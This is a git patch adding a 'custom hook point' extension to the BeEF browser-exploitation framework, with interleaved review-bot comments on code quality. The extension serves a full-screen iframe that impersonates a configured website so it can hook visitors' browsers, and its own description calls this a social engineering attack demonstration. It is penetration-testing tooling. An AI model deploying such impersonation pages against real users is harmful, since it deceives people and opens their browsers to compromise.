From a6a7536e736e7788e12df91756a8f132ced24970 Mon Sep 17 00:00:00 2001
From: Christian Frichot
Date: Thu, 17 May 2012 18:52:35 +0800
Subject: [PATCH] Issue #678 - Custom Hook Point Extension initial commit
---
extensions/customhook/api.rb | 38 +++++++++++++++++
extensions/customhook/config.yaml | 24 +++++++++++
extensions/customhook/extension.rb | 33 +++++++++++++++
extensions/customhook/handler.rb | 61 +++++++++++++++++++++++++++
extensions/customhook/html/index.html | 18 ++++++++
5 files changed, 174 insertions(+)
create mode 100644 extensions/customhook/api.rb
create mode 100644 extensions/customhook/config.yaml
create mode 100644 extensions/customhook/extension.rb
create mode 100644 extensions/customhook/handler.rb
create mode 100644 extensions/customhook/html/index.html
diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb
new file mode 100644
index 000000000..90a47bdb9
--- /dev/null
+++ b/extensions/customhook/api.rb
@@ -0,0 +1,38 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+
+ module RegisterHttpHandlers
+
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Customhook::RegisterHttpHandlers, BeEF::API::Server, 'mount_handler')
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Customhook::RegisterHttpHandlers, BeEF::API::Server, 'pre_http_start')
+
+ def self.mount_handler(beef_server)
+ configuration = BeEF::Core::Configuration.instance
+ beef_server.mount(configuration.get("beef.extension.customhook.customhook_path"), BeEF::Extension::Customhook::Handler.new)
+ end
+
+ def self.pre_http_start(beef_server)
+ configuration = BeEF::Core::Configuration.instance
+ print_success "Successfully mounted a custom hook point"
+ print_more "Mount Point: #{configuration.get('beef.extension.customhook.customhook_path')}\nLoading iFrame: #{configuration.get('beef.extension.customhook.customhook_target')}\n"
+ end
+ end
+end
+end
+end
diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml
new file mode 100644
index 000000000..9daf85e72
--- /dev/null
+++ b/extensions/customhook/config.yaml
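Review bot: `pre_http_start` prints "Successfully mounted a custom hook point" unconditionally, so the banner appears even if `mount_handler` never ran or `customhook_path` is missing from the config; nothing in the hunk checks the value before it is passed to `beef_server.mount`. A guard in `mount_handler`, such as `path = configuration.get('beef.extension.customhook.customhook_path')` followed by `return if path.nil? || path.empty?`, would keep a broken config from mounting the handler at an unintended path. How `beef_server.mount` treats a path that collides with an existing mount is not visible here and is worth confirming. Both methods would also benefit from a short `# @note` comment, in the style handler.rb uses, naming the API hook each one serves.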
@@ -0,0 +1,24 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ extension:
+ customhook:
+ enable: false
+ name: 'Custom Hook Point with iFrame Impersonation'
+ customhook_path: "/yougotchipmunked"
+ customhook_target: "http://www.chipmunks.com"
+ customhook_title: "Alvin and the Chipmunks.."
+
diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb
new file mode 100644
index 000000000..089425f23
--- /dev/null
+++ b/extensions/customhook/extension.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+
+ extend BeEF::API::Extension
+
+ @short_name = 'customhook'
+
+ @full_name = 'Custom Hook Point with iFrame Impersonation'
+
+ @description = 'An auto-hook and full-screen iframe - demonstrating extension creation and social engineering attacks'
+
+end
+end
+end
+
+require 'extensions/customhook/api'
+require 'extensions/customhook/handler'
diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb
new file mode 100644
index 000000000..04b601094
--- /dev/null
+++ b/extensions/customhook/handler.rb
@@ -0,0 +1,61 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+
+ class Handler
+
+ def call(env)
+ @body = ''
+ @request = Rack::Request.new(env)
+ @params = @request.query_string
+ @response = Rack::Response.new(body=[], 200, header={})
+ config = BeEF::Core::Configuration.instance
+
+ eruby = Erubis::FastEruby.new(File.read(File.dirname(__FILE__)+'/html/index.html'))
+
+ @body << eruby.evaluate({'customhook_target' => config.get("beef.extension.customhook.customhook_target"),
+ 'customhook_title' => config.get("beef.extension.customhook.customhook_title")})
+
+ @response = Rack::Response.new(
+ body = [@body],
+ status = 200,
+ header = {
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0',
+ 'Content-Type' => 'text/html',
+ 'Access-Control-Allow-Origin' => '*',
+ 'Access-Control-Allow-Methods' => 'POST, GET'
+ }
+ )
+
+ end
+
+ private
+
+ # @note Object representing the HTTP request
+ @request
+
+ # @note Object representing the HTTP response
+ @response
+
+ end
+
+end
+end
+end
diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html
new file mode 100644
index 000000000..c1acd833a
--- /dev/null
+++ b/extensions/customhook/html/index.html
@@ -0,0 +1,18 @@ + + + <%= @customhook_title %> + + + + + + +
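Review bot: `call` keeps per-request state in `@body`, `@request`, `@params` and `@response`, but api.rb mounts a single `Handler.new` for all requests, so under a threaded server two requests could interleave on `@body`; plain locals avoid that, e.g. `body = eruby.evaluate(...)` followed by `Rack::Response.new([body], 200, headers)`. The first `Rack::Response.new(body=[], 200, header={})` is built and then overwritten, and `@params` is never read, so both lines can be dropped. The `body =`, `status =` and `header =` inside the argument list are local assignments rather than keyword arguments, which is misleading to read. The bare `@request` and `@response` after `private` are no-op expressions evaluated at class level, and `private` does not apply to instance variables, so those `@note` comments belong on `call` instead.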
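Review bot: `<%= @customhook_title %>` writes the configured title into the page without HTML escaping, because Erubis escapes only with the `<%== ... %>` form; a title containing `<` or `&` in config.yaml would corrupt the markup. `<%== @customhook_title %>` would avoid that. The same presumably applies wherever `@customhook_target` is emitted, but the template's tags are not visible in this view of the hunk, so that needs checking against the file.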